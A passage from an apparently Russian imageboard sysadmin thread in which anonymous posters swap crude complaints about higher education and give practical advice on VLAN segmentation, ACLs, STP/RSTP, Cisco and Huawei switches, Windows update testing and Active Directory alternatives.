может, там ДОКУМЕНТЫ ВАЖНЫЕ ОТКРЫТЫ;
2) в филиале в ебенях десктоп из головного ДЦ будет полдня грузиться;
3) ну и дорого плюс ёбнутое лицензирование.
Аноним 16/01/18 Втр 10:59:36 #634 №1163956 
>>1163938
>МИРЭА
Лол, меня хотели туда запихнуть в нулевых, ездил туда на подготовительные занятия - освещение хуёвое, отопления нет, в аудиториях все в куртках занятия говно - ну я и забил хуй и поступил в соседний МИТХТ - откуда вылетел на 4 курсе, потому что тоже говно ебаное - а сам МИТХТ внезапно объединился с МИРЭА в некий МТУ - представляю какая это шарага.

>>1163949
>Сам бомблю, братишка, сам бомблю
Да у меня вообще с государственными учебными заведениями довольно хуёво складывается. Хорошо хоть вернулся в ВУЗ после армейки и, пересилив себя, таки осилил высшее образование. Но больше в ВУЗы эти сраные не ногой.

Зато в том году отучился в "Специалисте" на сетевика и ещё по программе внедрения бесконтактной идентификации в учреждениях культуры - вот это всё реально доставило. Чай, не рашкоВУЗы.
Аноним 16/01/18 Втр 11:04:44 #635 №1163958 
>>1163956
>в некий МТУ - представляю какая это шарага.
У нашего правительства план убрать все лишние ВУЗы, и сделать высшее образование элитарным, как в США, чтобы не каждый пидораха шёл за коркой, а были именно реальные специалисты, понимающие суть вопроса. А сам МТУ должен за сколько-то там лет попасть в мировой топ 500, как МГУ, поэтому такие и аббревиатуры, лол, не уверен, что взлетит, но там посмотрим
мимо закончившей заочку МИРЭА
Аноним 16/01/18 Втр 11:24:56 #636 №1163964 
>>1163958
>чтобы не каждый пидораха шёл за коркой
Интересно как они это сделают если построенный совком социальный лифт без высшего образования не поднимает выше второго этажа.
Аноним 16/01/18 Втр 11:32:37 #637 №1163967 
>>1163412

Буду капать в DSR в L2 схеме.
Аноним 16/01/18 Втр 11:39:44 #638 №1163973 
>>1163956
>МИРЭА
Я там отучился в нулевых. Всё ОК было, но там сильно роляла кафедра. Я был на ВМС на кафедре НИИАА. Учили реально хорошо, а на соседней кафедре того же факультета и специальности люди просто нихуя не делали годами...

>отучился в "Специалисте" на сетевика
Ой, ой. По мне так и сертифицированные курсы fast line по cisco не дают достаточно хорошей подготовки, а уж что там в Специалисте творится, вообще боюсь себе представить.

Но и твой и мой случай лишний раз доказывают, что качественное образование - это в первую очередь заслуга учащегося и было бы желание учиться, а возможность найдется.

>>1163955
>ДОКУМЕНТЫ ВАЖНЫЕ ОТКРЫТЫ
Это всё легко решается созданием регламента и доведением его до сведения пользователей под подпись. Плюс комп не перезагружается внезапно, а предупреждает об этом сильно заранее. Если при таком раскладе кто-то теряет рабочие файлы - сам мудак, пусть остается в ночь и делает заново, лол.

>Начальник службы безопасности и IT-дир равны по рангу
>В принципе, так и надо.
Только по факту сотрудник отдела безопасности выше по иерархии, чем рядовой админ, т.к. первый последнему доступы ограничить может, а админ безопаснику - нет. В итоге равенство между IT и безопасностью в принципе невозможно, чтобы бы мы там формально не прописывали и не декларировали.
Аноним 16/01/18 Втр 11:49:57 #639 №1163981 
>>1163964
> не поднимает выше второго этажа
Я вангую, что у них наполеоновские планы, но на деле всё как обычно обосрётся не успев появиться
Думаю, что план такой: на обычных работников, выполняющих как конвейер рутинную операцию, перекладывающих бумажки и пишущих письма по электронной почте будут брать максимум после бакалавра, а то и после колледжа.
на главбуха, главадмина, главинженера должен идти минимум с хорошей вышкой, шарящий по всем направлениям господин, которые мыслит не в плоскости, а в пространстве

Что не устраивает сейчас? То, что у ВО нету ценности, даже дворники ходят с ВО и кассиры в пятёрочках, хотя им никогда эти знания не пригодятся, а ценность имеет только именитый вуз.
Поэтому зачем ждать пока пидораха просидит за 6 лет штаны в вузике, когда его можно отправить отучиться 3 года, получить базовые навыки в этом тупость российского образования,
так как за 3 года можно с 0 стать CCNP, который кроме сетей знать ничего не будет, но намного более квалифицированным специалистом, чем рашен колледж
, и пойти платить налоги.
Студент же невыгодное явление для государства по мнению пыни, у нас бурить некому, или строить, а планктон не нужен, он долго учится и не платит налоги, а потом не выдаёт натуральное производство. А майнинг так вообще головная боль, так как пидорахи стали лучше жить, зачем работать за 15к в меся, если можно купить 1 вк и она будет тебе отбивать эту сумму сидя на жопе и двачуя капчу

Короче, идея средней паршивости, а зная российско-совковый менталитет ждём когда всё окончательно обосрётся под стандартами 70ых годов.
Насколько я знаю, у нас даже ТБ по работе за ПЭВМ не переписали, мы всё перед ЭЛТ ЧБ мониторами сидим, с подставкой
Аноним 16/01/18 Втр 11:53:51 #640 №1163985 
>>1163973
>Я там отучился в нулевых. Всё ОК было, но там сильно роляла кафедра
Бля, как меня там матан заебал, "типовой расчёт" ой бляяя, я сейчас ряд фурье хуй разложу

Был на вычислительной технике
Аноним 16/01/18 Втр 11:54:19 #641 №1163988 
>>1163981
>тупость российского образования,
>так как за 3 года можно с 0 стать CCNP, который кроме сетей знать ничего не будет, но намного более квалифицированным специалистом, чем рашен колледж

Вот это двачую.
Аноним 16/01/18 Втр 12:00:42 #642 №1163994 
>>1163981
В чем-то ты прав. Точнее, во всем, что касается отечественного высшего образования. А неточность в непонимании системы вышки "там". В Европе/США практически никто вышку не получает, потому что вышка - это для тех, кто хочет заниматься научной деятельностью. И всякие выпускники IT-since в штатах - это не наши кодеры с запись в диплом "инженер-программист", а реальные ученые, разбирающиеся в вычислительной сложности алгоритмов, дискретной математике и прочих сложных вещах.

И количество ВУЗов то мы сократим, но вот только от этого выпускники того, что осталось не превратятся из кодеров в ученых!

>>1163985
Да, первые 3 семестра ебали знатно: линейка, матан, ТФКП, диффуры, дискра, физика и большая часть этого всего параллельно и на весьма серьезном уровне. Но потом стало сильно проще - пошла специализация, а в IT у нас полный швах, да и математика то сильная осталась со времен совка - скоро и она деградирует, вероятно.

>>1163988
Как будто что-то плохо. Выше уже написал - во всем мире простые люди идут таким путем и не знают проблем.
Аноним 16/01/18 Втр 12:11:51 #643 №1163996 
>>1163994
> в IT у нас полный швах
Да, я когда защищался, так как был уже действующим админом, то ясен хуй брал сетевой диплом, просто переписал частями свой сети, и это пушка, антиплагиат показал 80% оригинального текста, диплом со всеми конфигами вышел на 150 страниц, я им рассказывал про бамп ссл трафика, про флаги пакетов, про то как можно наёбывать фаерволлы по длинне пакета, когда новая информация перезаписывает старую, про интеграцию линукса в АД ДС, про многоранговые сети, про то как упаковать IPsec в UDP, и вообще про всё, что актуально
Комиссия, и препод по сетям нихуя не понимали, по занятиям мы ушли чуть дальше модели ОСИ, поставили оценку "ОТЛИЧНО", так как рецензент написал "Отлично", пушка, короче
Но вот матаном, физикой и электротехникой я заебался на всю жизнь, хотя матан очень структурировал моё мышление, о том сколько приходилось решать первые 3 года не жалею
Аноним 16/01/18 Втр 12:15:29 #644 №1163997 
>>1163994
>во всем мире простые люди идут таким путем и не знают проблем
Да я бы тоже на "абразавание" хуй забил, и так вылетев с 4 курса, если бы после этого в армии сапогами не отпинали бошку так, что я понял, что без него в этой стране, если собираешься работать не на себя, никуда -

Тащемта и моя текущая должность требует высшего образования. Хорошо хоть не профильного, а то бы я и тут обосрался с моим дипломом гуманитария.
Аноним 16/01/18 Втр 12:20:02 #645 №1163998 
>>1163996
Согласен, матан был полезен только для мозгов, сам по себе ни разу не пригодился и сейчас окончательно забыт.

По поводу IT - комиссия состоит из старых дедов, они нихуя не секут ни в чем, а оценивают просто "доклад", ну то есть в целом как ты держишь, насколько уверенно говоришь, отвечаешь на вопросы.

Я защищал вообще не свою разработку, лол! Но в итоге получил отлично, а мой доклад сочли лучшим среди всех за день... из-за этого чуть было не случился скандал, потому что я "забыл" явиться на оглашение результатов защиты.

>>1163997
Так и я шел в ВУЗ чисто ради откоса от армии. Но... на военку меня не взяли из-за... недобора веса. В итоге после выпуска пришлось полгода работать на оборонку по специальности за копейки (это такая извращенная форма откоса была), пока не мать не помогла с деньгами на покупку военника.
Аноним 16/01/18 Втр 12:22:26 #646 №1164000 
изображение.png
>>1163998
>В итоге после выпуска пришлось полгода работать на оборонку по специальности за копейки (это такая извращенная форма откоса была), пока не мать не помогла с деньгами на покупку военника.

А я вообще на всё забил, пока за мной не приехали менты и не увезли в военкомат, откуда увезли в распределитель и срауз в часть.

Хороший пример того как не надо забивать на всё хуй.
Аноним 16/01/18 Втр 12:25:41 #647 №1164001 
>>1164000
>не надо забивать на всё хуй
На надо, но понять где грань мне очень сложно, сейчас читаю про биохакинг: https://vc.ru/26886-personal-biohacking и понимаю, что это чуть-ли не другая крайность...
Аноним 16/01/18 Втр 15:16:59 #648 №1164040 
Сетевики, расскажите в трёх словах о best practices в ACL между вланами/подсетями/рутером, на разных уровнях доступа/агрегации/ядра, какой трафик режете, какой разрешаете
Аноним 16/01/18 Втр 15:36:27 #649 №1164046 
>>1164040
Всё зависит от задач. Как правило стараются делать как можно меньше ACL, т.к. они могут сильно влиять на производительность. Самое частое - предоставление влана подрядчикам без доступа ко внутренним сетям, т.е. инет-онли.
Аноним 16/01/18 Втр 15:39:49 #650 №1164048 
>>1164046
Наверное кассы и видеонаблюдение в отдельные вланы без доступа? как и телефония?

А LLDP вообще юзается где-то или нет?
Аноним 16/01/18 Втр 15:45:07 #651 №1164051 
>>1164048
>видеонаблюдение
Вообще для этого нужна отдельная изолированная физическая сеть, иначе никак. Равно как и для СКУДа. Иначе это будет уже не безопасность...

>кассы
Зависит от площадки. В отдельный влан то их выделяют, конечно, но скорее чтобы на роутере проще было PBRить, если нужно или на фаерволе фильтровать. Доступ из влана с кассами к пользакам и обратно никто не запрещает как правило, а иногда он и вовсе нужен буквально, т.к. некоторые кассы могут с компом по сети взаимодействовать.

>телефония
Она, конечно, в отдельном влане, если IP-телефония вообще есть, удовольствие очень дорогое. А LLDP юзается, например, с телефонами avaya, подключенными к коммутаторам cisco.
Аноним 16/01/18 Втр 15:52:17 #652 №1164053 
>>1164051
> avaya,
Я думал, что такое только сиська умеет, хм интересно
Аноним 16/01/18 Втр 22:14:29 #653 №1164264 
>>1164051
На одном из рабочих мест всё это было свалено в одну плоскую сеть. Описал как всё разбросать по вланам, запросил оборудование и кучу сетевых разеток с дополнительными шкафами коммутационными, мне сначала ответили нет проблем, купили с2960g 48 портовых несколько, часть с пое под телефоны, часть без, на "ядро" одну c3750g, я сел с ними экспериментировать (до этого не особо с реальным железом сидел). А потом резко перестали выделять бабло на ИТ, и отказали в розетках и коммутационных шкафах, так что на новое оборудование нормально было и не переехать. В итоге ушёл оттуда, а там всё ещё оборудование пылится, сеть плоская и розеток нет.
Аноним 17/01/18 Срд 00:33:10 #654 №1164321 
>>1164051
>Вообще для этого нужна отдельная изолированная физическая сеть, иначе никак.

Лол бля у нас камеры вообще ни к каким сетям не подключены и живут "своей жизнью". Как следствие что отсутствие оперативного доступа, что дикий рассинхрон во времени со всем остальным оборудованием и реальным временем.
Аноним 17/01/18 Срд 08:43:11 #655 №1164369 
>>1164053
Ну в плане телефонии авайя может даже и получше будет, чем циско.

>>1164264>>1164321
Обычно "камеры" - это сеть видеонаблюдения, где помимо камер есть сервера, куда пишутся все видео-потоки и рабочие места безопасников, где на куче мониторов можно смотреть сразу десятки видео-потоков и быстро переключаться между ними. Если камеры приличные, то трафик они могут генерировать очень существенный, потому что даже если речь идет только о контроле всех входов/выходов/парковок/лифтов их нужно овер дохуя. Оно, конечно, может работать поверх пользовательского оборудования, но помимо нагрузок, есть еще и опасность атаки со стороны любого хуя с ноутом, который задосить камеру, например...
Аноним 17/01/18 Срд 09:12:19 #656 №1164377 
>>1162884
Бля, аж появились пораженчиские мысли, съебать обратно в мухосрань и искать в анальных муках работу за 20к.
Аноним 17/01/18 Срд 09:20:54 #657 №1164380 
>>1164369
>Ну в плане телефонии авайя может даже и получше будет, чем циско.

Смеешься что-ли? По личному опыту, телефонии от сиськи вообще не место в нормальной компании. Дорого и слишком неповоротливо. CUCM вообще ужасен.
Аноним 17/01/18 Срд 10:13:37 #658 №1164392 
>>1164380
>>1164369
Про сиськи от части вздвачну, закупали до крымнаш циски по 2700р/трубка, после бума, я стал закупать фанвиллы, функционал больше, надёжность не хуже, как работает так и работает, а цена вместо 90$ всего 60
Аноним 17/01/18 Срд 11:12:32 #659 №1164436 
38-mops-foto.jpg
Сетевики, срочно, вопрос про СТП: какие stp enhancements где используются, и используются ли вообще с приходом RSTP
Аноним 17/01/18 Срд 12:58:07 #660 №1164538 
>>1163958
>У нашего правительства план убрать все лишние ВУЗы, и сделать высшее образование элитарным, как в США,
План верный, в общем-то. Т.к. большинство абитуры идет в ВУЗы непонятно зачем. Исходя из вопроса "А где учат на программиста" если мы об ИТ. Если такой вопрос возникает, то это не в ВУЗ надо, а в техникум.
Аноним 17/01/18 Срд 13:06:45 #661 №1164545 
>>1164040
Не знаю какие там best practice, скажу, как это сделано у нас.
По факту у нас почти нигде нет никаких ACL.
Между пользователями трафик никак не режется. Пользовател разбиты на Vlan по этажам.
Есть гостевые сегменты, они отделены от пользовательсоко фаерволлом.
Пилить ACL руками считаю неправильным. Нужно как можно меньше создавать такой ручной работы, иначе можно в ней утонуть к чертовой матери.
Аноним 17/01/18 Срд 13:10:31 #662 №1164548 
>>1164436
>Сетевики, срочно, вопрос про СТП: какие stp enhancements где используются, и используются ли вообще с приходом RSTP
STP enhancements???
У нас STP (точнее RSTP) работает по дефолту. Единственное, что меняем, это priority на коммутаторах, которые выступают ядром/распределением. STP это вообще такая тема, которую, как многие считаю, лучше не трогать и не опираться на него.
Использование M-LAG и LACP и ьтехнологий стекирования коммутаторов нифелирует надобность тюнинговать STP для отказоустойчивости.
Аноним 17/01/18 Срд 13:12:49 #663 №1164552 
>>1164548
>У нас STP (точнее RSTP) работает по дефолту.
ну всякие portfast, bpduguard, bpdufilter используем где надо, конечно же. Но глобально СТП не трогаем.
Вообще я считаю, что в сети надо L2 домен как можно больше сужать и роутинг выводить даже на уровень доступа, если есть такая возможность. А дальше уже L3 и динамический роутинг.
Аноним 17/01/18 Срд 13:21:27 #664 №1164561 
image001.gif
>>1164552
>роутинг выводить даже на уровень доступа
Я, конечно, нихуя не CCNA, но мне казалось, что рутер слишком дорогой, и межденный по сравнению с асиками в коммутаторах, где цена за порт в тысячу раз меньше

а разве LACP должно исключать RSTP в том же ядре? Я просто сколько читаю, там любят соединять коммутаторы перекрёстно, или эти картинки подразумевают виртуализацию коммутаторов?
Как на пике
Аноним 17/01/18 Срд 13:22:49 #665 №1164563 
>>1164545
То есть ACL по сути только на межсетевом экране, где запрещается все кроме прокси и тп?
Аноним 17/01/18 Срд 13:30:50 #666 №1164570 
>>1164561
>Я, конечно, нихуя не CCNA, но мне казалось, что рутер слишком дорогой, и межденный по сравнению с асиками в коммутаторах, где цена за порт в тысячу раз меньше
Сейчас все коммутаторы умеют L3, хотя бы урезанный. И вот такие коммутаторы ставятся на доступ. С ядром и распределением L3-стыки и роутинг. Роутеры тут не нужны, т.к. коммутаторы умеют L3. Такой дизайн поможет избежать проблем на L2 уровне, всякие петли и т.д. и даст ECMP. Ну и даст возможность гибко регилировать политики на фаерволле. С L3 проще работать, чем с L2. Может у кого-то другое мнение, было бы интересно узнать.
>>1164563
>То есть ACL по сути только на межсетевом экране, где запрещается все кроме прокси и тп?
ну что-то вроде того.
На фаерволле разграничен доступ из сегментов ДМЗ в сегмент серверов, из пользовательского сегмента в сегмент серверов.
Также на фаерволле (у нас) терминируются туннели и разграничивается трафик из филиалов в сегменты ДМЗ и серверов...ну и так далее.

Также лично у нас в каждом из наших филиалов стоят аппаратеные фаерволлы, на которых мы резем трафик, пробрасываем порты и так далее.
Просто это удобнее, т.к. есть единая консоль управления всеми этими фаерволлами.
Аноним 17/01/18 Срд 13:35:46 #667 №1164576 
>>1164561
имеется виду покупать L3 свичи на доступ аля Cisco 3650 у которых аплинковые порты будут сразу в роутед режиме (т.е. адрес вешается прям на порт, а не на SVI), у такого подхода есть как плюсы (полная утилизация всех аплинков) так и минусы (на каждом акцесс свиче свои вланы), самый топовый вариант Campus Fabric.
На пике свичи аггрегации либо в стеке, либо MLAG, со стороны акцес свичей они выглядят как один.
Аноним 17/01/18 Срд 13:46:42 #668 №1164595 
>>1164576
> либо в стеке, либо MLAG
либо VSS, йоу!
Аноним 17/01/18 Срд 13:48:57 #669 №1164598 
>>1164576
>MLAG
А он работает на l2? В случае ядра и агрегации, наверное да, там mlag, но вроде l2 коммутаторы в него не могут
Или я путаю?
>>1164570
> все коммутаторы умеют L3
Даже 2960? Он вроде не умеет делать no switchport
Или я тут тоже путаю
Аноним 17/01/18 Срд 13:56:38 #670 №1164618 
>>1164598
>А он работает на l2?
MLAG технология, которая поддерживается на L3 коммутаторах. На коммутаторах, которые L3 не понимают, просто не нужна его поддержка.
>Даже 2960?
Это надо даташиты смореть. Возможно какие-то из 2960 и умеют. Хотя сомневаюсь.
Циска сейчас вообще позиционирует свои 3850 как коммутаторы доступа/распределения. Но по мне это очень уж круто лдя большинства конторок.
Аноним 17/01/18 Срд 14:00:39 #671 №1164626 
>>1164618
Вот-вот и я про то
Аноним 17/01/18 Срд 14:01:10 #672 №1164628 
>>1164598
>Даже 2960?
Вроде 2960 с прошивкой IP Lite поддерживает l3
Аноним 17/01/18 Срд 14:21:50 #673 №1164652 
>>1164628
>IP Lite
Рассказывай что это такое и с чем это едят

>>1164618
>Циска сейчас вообще позиционирует свои 3850 как коммутаторы доступа/распределения
Я думаю, что они охуели, и вообще отказались от нищенских сегментов, Cisco Catalyst 2960-48, стоит сейчас тысяч 30, это я понимаю, приемлемо для мелко-средней конторы и 200к за 3850 - охуели мрази, что ли, 500$ vs 3000$, я думаю, что даже в яндексе не закупают такие коммутаторы, цена на порт безумная, особенно для рядовых юзеров и принтеров
Аноним 17/01/18 Срд 14:25:22 #674 №1164658 
>>1164652
>что даже в яндексе не закупают такие коммутаторы, цена на порт безумная, особенно для рядовых юзеров и принтеров
Я думаю закупают в каких-нибудь госах, где надо перепилить и освоить бюджет.
>Рассказывай что это такое и с чем это едят
вот тут фигурирует
https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-2960-x-series-switches/data_sheet_c78-728232.html
Аноним 17/01/18 Срд 14:29:59 #675 №1164667 
>>1164658
Да, почитал, только на 2960-XR серии, где 48 портов тоже стоит 200к, всё равно жесть, можно брать и 3850 с таким же успехом
Аноним 17/01/18 Срд 14:33:52 #676 №1164672 
image.png
Антонасы, больше негде спросить, лол.
Как определить ревизию железки из консоли?
Аноним 17/01/18 Срд 14:34:13 #677 №1164673 
>>1164672
PS на самом устройстве не написано. только модель
Аноним 17/01/18 Срд 14:35:20 #678 №1164676 
>>1164672
display version не дает?
Аноним 17/01/18 Срд 14:39:02 #679 №1164678 
>>1164676
а, я пробую show и удивляюсь. спасибо
Аноним 17/01/18 Срд 14:47:46 #680 №1164690 
>>1164676
а серийник устройства можно как-нибудь получить?
Аноним 17/01/18 Срд 14:49:37 #681 №1164693 
>>1164690
>а серийник устройства можно как-нибудь получить?
Попробуй проискать в display diagnostic-information
Будет мноог лишнего, но серийник должен быть.
Аноним 17/01/18 Срд 16:36:29 #682 №1164748 
Какую винду для офиса сейчас стоит закупить? Поискать 7, или плюнуть и покупать 10? Семёрку через пару лет перестанут поддерживать, а у Десятки иппать сколько глюков. Недавно ещё пять штук в офис поставили, так у меня половина вызовов с этих компов. То одно отвалится, то другое не работает, то третье тормозит. Но за ней, как ни крути, мативо, будущее. Я, конечно, такое будущее в гробу видал, но против прогресса не попрёшь же.
Аноним 17/01/18 Срд 16:41:40 #683 №1164750 
>>1164748
у нас 10ка убила с пол сотни ПК аппрувеным апдейтом с всуса, пидоры мягкие
Если штат на 7, то лучше 7 купи, хотя тяжело найти
Аноним 17/01/18 Срд 16:59:36 #684 №1164759 
Што-то я не понимаю.
Есть l2 хуявей 2700. Я создал юзера, дал ему 3 лвл.
Но в дефолтную веб-морду он зайти не может.
По ssh при этом ходит без проблем.

Может, для морды есть какой-то отдельный сервис, который надо разрешить для этого юзера? Как-то я пока не понимаю логики работы хуявеев.
Аноним 18/01/18 Чтв 10:04:32 #685 №1165127 
image.png
антонасы, отправляют меня ставить оборудование на точку, а я как-то и не шарю особо.
в точке готовый канал, мне дадут 1 маршрутизатор и 3 коммутатора (много юзеров)
маршрутизатор уже настроен под канал

насколько я понимаю, схема должно быть как на пикрл

1. есть ли на коммутаторах специальный порт, которым они соединяются друг с другом (а не с обычными хостами)? модель не знаю. какую дадут. ну обычно есть? или можно втыкать в любой порт, а маршрутизатор фактически будет думать, что это один большой коммутатор перед ним?




Аноним 18/01/18 Чтв 10:08:09 #686 №1165128 
2. что такое комбо wan порт? это для резервирования каналов, когда есть два вана?
Аноним 18/01/18 Чтв 10:09:47 #687 №1165130 
>>1165127
>есть ли на коммутаторах специальный порт, которым они соединяются друг с другом (а не с обычными хостами)?
Обычно есть такие порты. При условии, что коммутатор управляемый и как-то изначально настроен. Если настраивал не ты, то тебе должны были сказать, в какой порт включать коммутатор.
>что такое комбо wan порт? это для резервирования каналов, когда есть два вана?
Не знаю, какая-то видимо маркетинговая терминология конкретного вендора.
Схему я бы поменял, включив оба коммутатора в тот коммутатор, в который включен роутер.
Аноним 18/01/18 Чтв 10:21:15 #688 №1165139 
image.png
>>1165130
>включив оба коммутатора в тот коммутатор, в который включен роутер
Подожди, это как?
Аноним 18/01/18 Чтв 10:26:00 #689 №1165140 
>>1165139
>Подожди, это как?
Я бы сделал вот так, как справа.
Но все зависит от того, как в том офисе сделана СКС, может так не получится. Но это в общем-то не обязательно. Просто не люблю включать свитчи последовательно друг за другом, как-то это не принято, на мой взгляд.
Аноним 18/01/18 Чтв 10:31:08 #690 №1165145 
>>1165140
логично, так меньше точек отказа. ок, спасибо.
Аноним 18/01/18 Чтв 10:34:46 #691 №1165148 
>>1165130
>Обычно есть такие порты.
А как они называются?
Аноним 18/01/18 Чтв 10:56:12 #692 №1165159 
Одмены, как сохранить конфигурацию на s2700?
Ребутнул и все почему-то слетело.
Аноним 18/01/18 Чтв 11:05:34 #693 №1165163 
>>1165159
соврал -
после ребута, отключены службы ssh/sftp
почему?
Аноним 18/01/18 Чтв 11:11:55 #694 №1165169 
>>1165163
и почему-то отвалился ип от Vlanif1 и запустился autoconfig
Аноним 18/01/18 Чтв 11:17:51 #695 №1165177 
>>1164748
По MS EA подписываешься на ту винду, которая продается, но имешь право даунгрейда. Семерка в личном кабинете еще есть.
>>1164750
>аппрувеным апдейтом с всуса
А на каком основании аппрувили, тогда уж?
Аноним 18/01/18 Чтв 11:21:55 #696 №1165179 
image.png
>>1165148
>А как они называются?
Они обычно выгляждят так. Их настраивают в режиме "trunk" как правило.
Но если у тебя офис маленький, то нет надобности в таких коммутаторах.
Аноним 18/01/18 Чтв 11:51:48 #697 №1165199 
>>1165177
на таком, что админ поставил автоапрув, а майки запустили обновление, которое убило шинду
не могу найти новость лучше: http://www.ntv.ru/novosti/1939660/
Вот мы на это попали
Аноним 18/01/18 Чтв 14:57:38 #698 №1165335 
>>1165199
>майки запустили обновление, которое убило шинду
У них это регулярно.
>админ поставил автоапрув
С одной стороны, все ручками муторно, с другой - что ж, ССЗБ. По идее, нужен пул смертников на такой случай, куда апдейты аппрувятся автоматом. И если за неделю ничего не сломалось, то можно этот список одобрять и для всех.
Аноним 18/01/18 Чтв 15:56:47 #699 №1165380 
>>1165335
> По идее, нужен пул смертников на такой случай, куда апдейты аппрувятся автоматом. И если за неделю ничего не сломалось, то можно этот список одобрять и для всех.

Это называется тестирование. И нормальные админы так и делают. Пусть обновы ставятся с опозданием в неделю, но хотя бы офис не ляжет в миг.
Аноним 18/01/18 Чтв 16:09:39 #700 №1165394 
>>1165335
>>1165380
Надо самому всус поковырять, я его последний раз видел дома на виртуалке
Аноним 19/01/18 Птн 09:46:06 #701 №1165797 
изображение.png
>>1165380
>Это называется тестирование.
Обязательно на конечных пользователях это тестировать?
Аноним 19/01/18 Птн 09:51:19 #702 №1165800 
>>1165797
Можешь поднять с десяток разных виртуалок, с разными ОС, с разными доступами и задачами, сертификаты/софт и тестить
Аноним 19/01/18 Птн 09:53:31 #703 №1165801 
>>1165800
Как бы за те ебические бабки, которые платятся Майкрософт за их софтину, они не должны заниматься тестированием на своей стороне?
Аноним 19/01/18 Птн 09:56:45 #704 №1165802 
>>1165801
Они занимаются, просто бывают корявые апдейты, так как майки - пидорасы, и понимают, что никуда ты от них не уйдёшь
Какая альтернатива АД ДС? ОпенЛДАП? да хуй там плава, или от ЛДАП от маков в цену выше на порядок
У нас бедные эникеи бегали и восстанавливали с загрузочных дисков лол
Аноним 19/01/18 Птн 10:00:13 #705 №1165803 
Работаю год в конторе типа эникеем (на самом деле просто мальчиком, который с компуктерами ладит). Так вот я все это время ничего как администратор сети не делал. Хочу, так скажем, повысить свою квалификацию и полезность. С чего можно начать? Есть локальная сеть на рутере тплинк и коммутаторах, раскиданных по кабинетам. Можно администрировать сеть из 7 винды, не имея серверной оси? Дайте советов.
Аноним 19/01/18 Птн 10:26:12 #706 №1165808 
>>1165803
Сети начни с просмотра этого:
https://www.youtube.com/watch?v=Z-a7MNStFQs
Потом скачай и установи Wireshark, и потесть пакеты, которые ходят внутри сети, просто ради интереса, посмотри разные уровни и их заголовки

Без серверной ОС - нет, но тебе придётся ставить виртуалку с 2012/2016 шиндой и делать виртуальную 7ку, для ввода её в домен, для ГПО/ДФС/ДНС и тп

Мой совет по винде: https://www.youtube.com/channel/UCWF81cTBJoXQ-R4bClTBPUg

Очень годный, хоть и очень занудный канал, тут почти вся винда, разве, что powershell не рассматривается

и да, эникей - это и есть мальчик по компам, который нихуя не делает кроме вордов и екселей
Аноним 19/01/18 Птн 11:04:36 #707 №1165830 
>>1165808
С wireshark'ом я уже по приколу сидел.
>Без серверной ОС - нет, но тебе придётся ставить виртуалку с 2012/2016 шиндой и делать виртуальную 7ку, для ввода её в домен, для ГПО/ДФС/ДНС и тп
Не понял. Нужно поставить серверную винду на виртуалку и обычную тоже на виртуалку? Это же для обучения только или можно с реальной сетью работать с виртуально серверной винды?
>Без серверной ОС - нет
Это же еще нужен компьютер, на котором сервер будет круглосуточно работать? Без нее нельзя впн сделать? Еще есть же всякие проги для администрирования сети или они не подходят?
Аноним 19/01/18 Птн 11:08:27 #708 №1165832 
>>1165830
>проги для администрирования сети
Что ты имеешь в виду? Администрирование сети - это управление сетевыми устройствам. Но по факту у тебя, скорее всего, и управлять то нечем, кроме туполинк-роутера.
Аноним 19/01/18 Птн 11:21:50 #709 №1165842 
>>1165830
>С wireshark'ом я уже по приколу сидел.
Тут суть в том, что бы понять уровни: биты/фреймы/пакеты
понять заголовки всего, что куда и откуда, как вообще всё это ходит в сети, как разделяется одно от другого
В вайршарк есть прямо три подпункта в каждом перехваченном кадре: заголовок кадра, заголовок IP пакета, заголовок TCP и сама информация внутри TCP
>>Без серверной ОС - нет, но тебе придётся ставить виртуалку с 2012/2016 шиндой и делать виртуальную 7ку, для ввода её в домен, для ГПО/ДФС/ДНС и тп
>Не понял. Нужно поставить серверную винду на виртуалку и обычную тоже на виртуалку? Это же для обучения только или можно с реальной сетью работать с виртуально серверной винды?
1 - во всём мире используется виртуализация, покупается сервак с 1/2/4 и более процессорами, и сотней гигов ОЗУ и на нём нарезаются виртуалки под задачи. Вообще так и делают покупают физических 1-2-3 сервака и делают десятки виртуалок. Тут есть наёб с лицензированием, например "лицензия на физический процессор" или "лицензия на 1 ЦПУ и 1 виртуалку" и тп
На физический сервер ставят сразу ОС для виртуализации, то есть могут и без винда+Гипервизор, а чисто ВМВАР, и под ним уже режут как хотят
2 - ставь сначала для ознакомления, ты там по перваку столько дров наломаешь, что сам охуеешь, гугли вгугле VirtualBox, там можно создавать логические сети и объединять в них виртуальные ОС, вот первое задание для тебя: Поставь винсервер и подними DHCP + DNS, это просто и делается визардом, но что надо вводить в визарде придётся изучить
>>Без серверной ОС - нет
>Это же еще нужен компьютер, на котором сервер будет круглосуточно работать? Без нее нельзя впн сделать? Еще есть же всякие проги для администрирования сети или они не подходят?
Прог никаких нету, прога для администрирования сети - путти, что бы ты мог по SSH цепляться в сетевому оборудованию и вводить команды.

Пока делай всё на своём ПК, просто тестируй и смотри как работает, на сеть в 7 ПК нету смысла делать какие-то сервера, я бы вообще поставил на такую сеть (я так и ставлю) дешманский кунап с 2 дисками для файловой помойки и роутер тысяч за 6 рублей, уровня RT-AC66U от ануса, он более-менее производительный, там удобная вебка и есть встроенный ВПН сервер

Для продакшена уже другие задачи, начни с того, что я написал выше - посмотри ролики и поставить ВиртуалБокс с 2012 виндой и 7кой
Аноним 19/01/18 Птн 14:12:02 #710 №1165993 
>>1165802
>Какая альтернатива АД ДС? ОпенЛДАП?
Насколько мне известно опенлдап это именно лдап и только он, а АД это комбайнер огромный, с ключевой фишкой в групповых политиках. Вроде бы опенлдап в такое не может. Самба последняя может, и я даже видел её в роли домайн-контроллера, но пока это как-то ненадёжно выглядит.
Аноним 19/01/18 Птн 14:20:43 #711 №1166001 
>>1165993
>Самба последняя может
Ага, но под самбу ещё надо линуксойда найти,плюс нету поддержки и гарантии работы, а виндузятник стоит 60-70к в месяц
Аноним 19/01/18 Птн 14:27:31 #712 №1166005 
>>1166001
Так линуксоид ещё дешевле стоит, потешные пердольки никогда особо на рынке не котировались.
Аноним 19/01/18 Птн 14:58:28 #713 №1166044 
>>1166005
>потешные пердольки
>RedHAt

ага, мань, я посмотрю куда ты будешь ставить оракл в продакшене, или proxy, или всякие там SIEM и DLP, только безумцы делают все исключительно на шиндоус, так это не работает
жирнота
Аноним 19/01/18 Птн 15:10:53 #714 №1166049 
>>1166044
У нищебродов без денег на лицензии от M$ конечно не работает. В сбербанке вот всё на винде, и в газпроме тоже.
Аноним 19/01/18 Птн 15:19:20 #715 №1166052 
>>1165993
>Самба последняя может, и я даже видел её в роли домайн-контроллера, но пока это как-то ненадёжно выглядит.

